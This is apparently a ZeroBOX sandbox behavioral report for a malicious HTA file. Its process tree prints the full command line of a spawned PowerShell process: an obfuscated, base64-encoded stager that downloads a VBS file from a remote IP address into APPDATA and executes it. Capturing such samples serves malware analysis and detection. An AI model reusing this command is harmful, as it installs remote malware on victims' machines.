| ZeroBOX

Behavioral Analysis

Process tree

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta.html

    2624
    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2624 CREDAT:145409

      2712
      • PoWERsHeLl.EXe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"

        2944

Process contents

No process loaded Click on a process in the tree above to load its data.